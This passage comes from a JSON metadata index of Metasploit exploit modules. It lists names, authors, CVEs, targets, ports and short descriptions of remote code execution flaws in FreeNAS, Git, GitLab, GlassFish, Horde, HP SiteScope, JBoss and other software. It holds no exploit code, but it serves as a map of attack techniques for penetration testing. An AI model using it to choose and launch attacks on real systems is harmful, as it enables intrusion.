"path": "/modules/exploits/multi/http/familycms_less_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/familycms_less_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/freenas_exec_raw": {
"name": "FreeNAS exec_raw.php Arbitrary Command Execution",
"full_name": "exploit/multi/http/freenas_exec_raw",
"rank": 500,
"disclosure_date": "2010-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution flaw\n in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n to the exec_raw.php page, an attacker may be able to execute arbitrary\n commands.\n\n NOTE: This module works best with php/meterpreter payloads.",
"references": [
"OSVDB-94441",
"URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/freenas_exec_raw.rb",
"is_install_path": true,
"ref_name": "multi/http/freenas_exec_raw",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gestioip_exec": {
"name": "GestioIP Remote Command Execution",
"full_name": "exploit/multi/http/gestioip_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"bperry"
],
"description": "This module exploits a command injection flaw to create a shell script\n on the filesystem and execute it. If GestioIP is configured to use no authentication,\n no password is required to exploit the vulnerability. Otherwise, an authenticated\n user is required to exploit.",
"references": [
"URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
"URL-https://github.com/rapid7/metasploit-framework/pull/2461",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic GestioIP 3.0"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/gestioip_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/gestioip_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_client_command_exec": {
"name": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390",
"full_name": "exploit/multi/http/git_client_command_exec",
"rank": 600,
"disclosure_date": "2014-12-18",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.",
"references": [
"CVE-2014-9390",
"URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
"URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
"URL-http://article.gmane.org/gmane.linux.kernel/1853266",
"URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
"URL-https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/",
"URL-http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29",
"URL-http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e",
"URL-http://selenic.com/repo/hg-stable/rev/6dad422ecc5a"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows Powershell"
],
"mod_time": "2018-10-18 11:24:54 +0000",
"path": "/modules/exploits/multi/http/git_client_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_client_command_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_submodule_command_exec": {
"name": "Malicious Git HTTP Server For CVE-2017-1000117",
"full_name": "exploit/multi/http/git_submodule_command_exec",
"rank": 600,
"disclosure_date": "2017-08-10",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module exploits CVE-2017-1000117, which affects Git\n version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed\n parameters from the username incorrectly. This can be used to inject\n commands to the operating system when the submodule is cloned.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised.",
"references": [
"CVE-2017-1000117",
"URL-https://seclists.org/oss-sec/2017/q3/280"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/multi/http/git_submodule_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_submodule_command_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/git_submodule_url_exec": {
"name": "Malicious Git HTTP Server For CVE-2018-17456",
"full_name": "exploit/multi/http/git_submodule_url_exec",
"rank": 600,
"disclosure_date": "2018-10-05",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module exploits CVE-2018-17456, which affects Git\n versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.\n\n When a submodule url which starts with a dash e.g. \"-u./payload\" is passed\n as an argument to git clone, the file \"payload\" inside the repository\n is executed.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised (e.g. git clone --recurse-submodules URL)",
"references": [
"CVE-2018-17456",
"URL-https://marc.info/?l=git&m=153875888916397&w=2",
"URL-https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6",
"URL-https://blog.github.com/2018-10-05-git-submodule-vulnerability"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/multi/http/git_submodule_url_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/git_submodule_url_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gitlab_shell_exec": {
"name": "Gitlab-shell Code Execution",
"full_name": "exploit/multi/http/gitlab_shell_exec",
"rank": 600,
"disclosure_date": "2013-11-04",
"type": "exploit",
"author": [
"Brandon Knight"
],
"description": "This module takes advantage of the addition of authorized\n ssh keys in the gitlab-shell functionality of Gitlab. Versions\n of gitlab-shell prior to 1.7.4 used the ssh key provided directly\n in a system call resulting in a command injection vulnerability. As\n this relies on adding an ssh key to an account, valid credentials\n are required to exploit this vulnerability.",
"references": [
"URL-https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/",
"CVE-2013-4490"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Linux (x64)",
"Unix (CMD)",
"Python"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/gitlab_shell_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlab_shell_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/gitlist_arg_injection": {
"name": "GitList v0.6.0 Argument Injection Vulnerability",
"full_name": "exploit/multi/http/gitlist_arg_injection",
"rank": 600,
"disclosure_date": "2018-04-26",
"type": "exploit",
"author": [
"Kacper Szurek",
"Shelby Pace"
],
"description": "This module exploits an argument injection vulnerability in GitList v0.6.0.\n The vulnerability arises from GitList improperly validating input using the php function\n 'escapeshellarg'.",
"references": [
"CVE-2018-1000533",
"EDB-44548",
"URL-https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GitList v0.6.0"
],
"mod_time": "2018-07-12 19:03:52 +0000",
"path": "/modules/exploits/multi/http/gitlist_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/gitlist_arg_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gitorious_graph": {
"name": "Gitorious Arbitrary Command Execution",
"full_name": "exploit/multi/http/gitorious_graph",
"rank": 600,
"disclosure_date": "2012-01-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in gitorious. Unvalidated input is passed to the shell allowing\n command execution.",
"references": [
"OSVDB-78480",
"URL-http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/gitorious_graph.rb",
"is_install_path": true,
"ref_name": "multi/http/gitorious_graph",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/glassfish_deployer": {
"name": "Sun/Oracle GlassFish Server Authenticated Code Execution",
"full_name": "exploit/multi/http/glassfish_deployer",
"rank": 600,
"disclosure_date": "2011-08-04",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Joshua Abraham <jabra@rapid7.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module logs in to a GlassFish Server (Open Source or Commercial) using various\n methods (such as authentication bypass, default credentials, or user-supplied login),\n and deploys a malicious war file in order to get remote code execution. It has been\n tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer\n GlassFish versions do not allow remote access (Secure Admin) by default, but it is required\n for exploitation.",
"references": [
"CVE-2011-0807",
"OSVDB-71948"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux Universal"
],
"mod_time": "2018-08-07 16:42:00 +0000",
"path": "/modules/exploits/multi/http/glassfish_deployer.rb",
"is_install_path": true,
"ref_name": "multi/http/glassfish_deployer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/glossword_upload_exec": {
"name": "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/glossword_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Glossword\n versions 1.8.8 to 1.8.12 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to the 'gw_temp/a/'\n directory.",
"references": [
"EDB-24456",
"OSVDB-89960"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/glossword_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/glossword_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/glpi_install_rce": {
"name": "GLPI install.php Remote Command Execution",
"full_name": "exploit/multi/http/glpi_install_rce",
"rank": 0,
"disclosure_date": "2013-09-12",
"type": "exploit",
"author": [
"Tristan Leiter < research@navixia.com >"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n GLPI 'install.php' script. This module is set to ManualRanking due to this\n module overwriting the target database configuration, which may introduce target\n instability.",
"references": [
"CVE-2013-5696",
"URL-https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html",
"URL-http://www.glpi-project.org/forum/viewtopic.php?id=33762"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GLPI 0.84 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/glpi_install_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/glpi_install_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/horde_form_file_upload": {
"name": "Horde Form File Upload Vulnerability",
"full_name": "exploit/multi/http/horde_form_file_upload",
"rank": 600,
"disclosure_date": "2019-03-24",
"type": "exploit",
"author": [
"Ratiosec"
],
"description": "Horde Groupware Webmail contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. The exploitation requires the Turba\n subcomponent to be installed.\n\n This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19.",
"references": [
"CVE-2019-9858",
"URL-https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-09 13:43:54 +0000",
"path": "/modules/exploits/multi/http/horde_form_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/horde_form_file_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/horde_href_backdoor": {
"name": "Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",
"full_name": "exploit/multi/http/horde_href_backdoor",
"rank": 600,
"disclosure_date": "2012-02-13",
"type": "exploit",
"author": [
"Eric Romang",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP code execution vulnerability introduced\n as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.",
"references": [
"CVE-2012-0209",
"OSVDB-79246",
"EDB-18492",
"URL-http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155",
"URL-http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/horde_href_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/http/horde_href_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sitescope_issuesiebelcmd": {
"name": "HP SiteScope issueSiebelCmd Remote Code Execution",
"full_name": "exploit/multi/http/hp_sitescope_issuesiebelcmd",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the\n APISiteScopeImpl web service, specifically in the issueSiebelCmd method, which allows the\n user to execute arbitrary commands without authentication. This module has been tested\n successfully on HP SiteScope 11.20 over Windows 2003 SP2, Windows 2008 and CentOS 6.5.",
"references": [
"CVE-2013-4835",
"OSVDB-99230",
"BID-63478",
"ZDI-13-263"
],
"platform": "Unix,Windows",
"arch": "x86, cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 / Windows",
"HP SiteScope 11.20 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sitescope_issuesiebelcmd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sitescope_uploadfileshandler": {
"name": "HP SiteScope Remote Code Execution",
"full_name": "exploit/multi/http/hp_sitescope_uploadfileshandler",
"rank": 400,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope. It exploits two\n vulnerabilities in order to get its objective. An authentication bypass in the\n create operation, available through the APIPreferenceImpl AXIS service, to create\n a new account with empty credentials and, subsequently, uses the new account to\n abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP.\n The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2\n and Linux CentOS 6.3.",
"references": [
"CVE-2012-3260",
"CVE-2012-3261",
"OSVDB-85121",
"OSVDB-85151",
"BID-55269",
"BID-55273",
"ZDI-12-174",
"ZDI-12-175"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 / Windows 2003 SP2",
"HP SiteScope 11.20 / Linux CentOS 6.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sitescope_uploadfileshandler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hp_sys_mgmt_exec": {
"name": "HP System Management Homepage JustGetSNMPQueue Command Injection",
"full_name": "exploit/multi/http/hp_sys_mgmt_exec",
"rank": 600,
"disclosure_date": "2013-06-11",
"type": "exploit",
"author": [
"Markus Wulftange",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in HP System Management Homepage. By\n supplying a specially crafted HTTP request, it is possible to control the\n 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),\n which will be used in an exec() function.",
"references": [
"CVE-2013-3576",
"OSVDB-94191",
"US-CERT-VU-735364"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Linux",
"Linux (x64)",
"Windows",
"Windows (x64)"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/hp_sys_mgmt_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/hp_sys_mgmt_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/hyperic_hq_script_console": {
"name": "VMware Hyperic HQ Groovy Script-Console Java Execution",
"full_name": "exploit/multi/http/hyperic_hq_script_console",
"rank": 600,
"disclosure_date": "2013-10-10",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the VMware Hyperic HQ Groovy script console to execute\n OS commands using Java. Valid credentials for an application administrator\n user account are required. This module has been tested successfully with\n Hyperic HQ 4.6.6 on Windows 2003 SP2 and Ubuntu 10.04 systems.",
"references": [
"URL-https://pubs.vmware.com/vfabric5/topic/com.vmware.vfabric.hyperic.4.6/ui-Groovy.html"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux",
"Unix CMD"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/hyperic_hq_script_console.rb",
"is_install_path": true,
"ref_name": "multi/http/hyperic_hq_script_console",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/ibm_openadmin_tool_soap_welcomeserver_exec": {
"name": "IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution",
"full_name": "exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec",
"rank": 600,
"disclosure_date": "2017-05-30",
"type": "exploit",
"author": [
"SecuriTeam",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote PHP code execution\n vulnerability in IBM OpenAdmin Tool included with IBM Informix\n versions 11.5, 11.7, and 12.1.\n\n The 'welcomeServer' SOAP service does not properly validate user input\n in the 'new_home_page' parameter of the 'saveHomePage' method allowing\n arbitrary PHP code to be written to the config.php file. The config.php\n file is executed in most pages within the application, and accessible\n directly via the web root, resulting in code execution.\n\n This module has been tested successfully on IBM OpenAdmin Tool 3.14\n on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.",
"references": [
"CVE-2017-1092",
"EDB-42091",
"URL-https://www-01.ibm.com/support/docview.wss?uid=swg22002897",
"URL-https://blogs.securiteam.com/index.php/archives/3210",
"URL-https://seclists.org/fulldisclosure/2017/May/105"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ibm_openadmin_tool_soap_welcomeserver_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/ispconfig_php_exec": {
"name": "ISPConfig Authenticated Arbitrary PHP Code Execution",
"full_name": "exploit/multi/http/ispconfig_php_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n which is intended to be reuploaded later to restore language settings. This feature\n can be abused to run arbitrary PHP code remotely on the ISPConfig server.\n\n This module was tested against version 3.0.5.2.",
"references": [
"CVE-2013-3629",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ispconfig_php_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/jboss_bshdeployer": {
"name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
"full_name": "exploit/multi/http/jboss_bshdeployer",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"Patrick Hof",
"jduck <jduck@metasploit.com>",
"Konrads Smelkovs",
"h0ng10"
],
"description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_bshdeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_deploymentfilerepository": {
"name": "JBoss Java Class DeploymentFileRepository WAR Deployment",
"full_name": "exploit/multi/http/jboss_deploymentfilerepository",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Jacob Giannantonio",
"Patrick Hof",
"h0ng10"
],
"description": "This module uses the DeploymentFileRepository class in\n JBoss Application Server (jbossas) to deploy a JSP file\n which then deploys the WAR file.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_deploymentfilerepository",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_invoke_deploy": {
"name": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",
"full_name": "exploit/multi/http/jboss_invoke_deploy",
"rank": 600,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"Patrick Hof",
"Jens Liebchen",
"h0ng10"
],
"description": "This module can be used to execute a payload on JBoss servers that have an\n exposed HTTPAdaptor's JMX Invoker on the \"JMXInvokerServlet\". By invoking\n the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\n to finally upload the selected payload to the target. The DeploymentFileRepository\n methods are only available on JBoss 4.x and 5.x.",
"references": [
"CVE-2007-1036",
"OSVDB-33744",
"URL-http://www.redteam-pentesting.de/publications/jboss"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_invoke_deploy.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_invoke_deploy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_maindeployer": {
"name": "JBoss JMX Console Deployer Upload and Execute",
"full_name": "exploit/multi/http/jboss_maindeployer",
"rank": 600,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"Patrick Hof",
"h0ng10"
],
"description": "This module can be used to execute a payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:MainDeployer functionality. To accomplish this, a\n temporary HTTP server is created to serve a WAR archive containing our\n payload. This method will only work if the target server allows outbound\n connections to us.",
"references": [
"CVE-2007-1036",
"CVE-2010-0738",
"OSVDB-33744",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Java based)",
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/jboss_maindeployer.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_maindeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jboss_seam_upload_exec": {
"name": "JBoss Seam 2 File Upload and Execute",
"full_name": "exploit/multi/http/jboss_seam_upload_exec",
"rank": 300,
"disclosure_date": "2010-08-05",
"type": "exploit",
"author": [
"vulp1n3 <vulp1n3@gmail.com>"
],
"description": "Versions of the JBoss Seam 2 framework < 2.2.1CR2 fail to properly\n sanitize inputs to some JBoss Expression Language expressions. As a\n result, attackers can gain remote code execution through the\n application server. This module leverages RCE to upload and execute\n a given payload.\n\n Versions of the JBoss application server (AS) admin-console are\n known to be vulnerable to this exploit, without requiring authentication.\n Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.\n\n This module provides a more efficient method of exploitation - it\n does not loop to find desired Java classes and methods.",
"references": [
"CVE-2010-1871",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=615956",
"URL-http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html",
"URL-http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html"
],
"platform": "Java",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
